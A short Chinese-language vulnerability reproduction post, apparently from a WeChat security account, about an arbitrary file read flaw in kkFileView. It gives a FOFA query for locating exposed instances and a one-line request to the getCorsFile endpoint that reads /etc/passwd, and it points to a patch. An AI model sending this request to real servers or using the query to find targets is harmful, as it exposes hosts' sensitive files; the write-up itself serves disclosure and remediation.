kkFileview存在任意文件读取漏洞
1. kkFileview简介
微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发
kkFileView,一款成熟且开源的文件文档在线预览项目解决方案。kkFileView为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等
2.漏洞描述
Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。
Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。
3.影响版本
4.fofa 查询语句
body=“kkFileView”
5.漏洞复现
漏洞数据包如下,因为浏览器编码的原因,直接访问链接不会触发漏洞,需要以数据包的形式访问:
http://127.0.0.1/getCorsFile?urlPath=file:///etc/passwd
6.POC&EXP
关注公众号 南风漏洞复现文库 并回复 漏洞复现24 即可获得该 POC 工具下载地址:
本次的 poc 加入了代理功能,方便各位师傅调试。
7.整改意见
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://github.com/kekingcn/kkFileView/issues/304